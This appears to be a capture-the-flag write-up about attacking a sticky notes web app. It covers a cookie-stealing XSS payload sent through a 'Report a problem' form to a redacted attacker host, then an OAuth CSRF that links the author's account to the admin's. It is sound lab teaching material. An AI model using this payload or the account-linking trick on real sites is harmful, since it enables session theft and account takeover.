![b8351bcaa9a2c4d2246c9e9412d2ce84.png](492eaf1024724a9ca716c9488041f549.png) ![0bdc89d9ac711b90060c2efcd6e50766.png](194b0105be5c4b2196726b27fee573ba.png) Sticky notes app. There's a couple interesting things to note here. Link with OAuth and Report a problem. Checking out 'Report a problem' first ![2f994cc8af90afa91f61b5c56a833ef8.png](613f6f1376ce47cc9e1f7d056e274f76.png) So this got me thinking. If the admin is looking into it, maybe there's some kind of vulnerability on the back end. I fired up my VPS and started a php session to see if I could steal some cookies Reported this payload as a problem: `<img src=x onerror=document.location="http://REDACTED/cookie.php?c="+document.cookie>` ![c80de1261875b7febaed611b723b297e.png](8e71371de3cc4b7b9d0572989c3ea670.png) So XXS is in play, but the cookies are set to HttpOnly. No dice there. The title of the challenge is a big hint on what to do next: Cross Site Request Forgery or CSRF (Sea Surf) for short I assumed that it had something to do with OAuth, so I fired up burp to capture the requests ![f6c0f620a4d8846eba98145f09db76ac.png](2b36c296013c4410913a3ea0f2ce1679.png) Forwarding the first request leaves us with the second. ![52f1070d8556b9c975c44e09c5e57534.png](e17df666af4a46bb964b8f33299dd565.png) After some testing I noted that the 'code' variable is one use. So I set this request to repeater and dropped it. Right click anywhere on the request and 'Copy URL' Back on the sticky notes app, we can report another problem ![dec2ed14f41e070eb7d643b2e93e5199.png](2f0263c5f4584d3d9cccf555e2d483f6.png) Send that off and then logging into our OAuth account we can see that we're now connected with the Admin sticky notes account ![49e6c0bd28fd3ce4b0dac9b75d8f2297.png](1964d857005945028795c85269ad0809.png) --- Back to [[_WebSite Publish/CTF/CTF Index|CTF Index]] Tags: #ctf #oauth #csrf #web Related: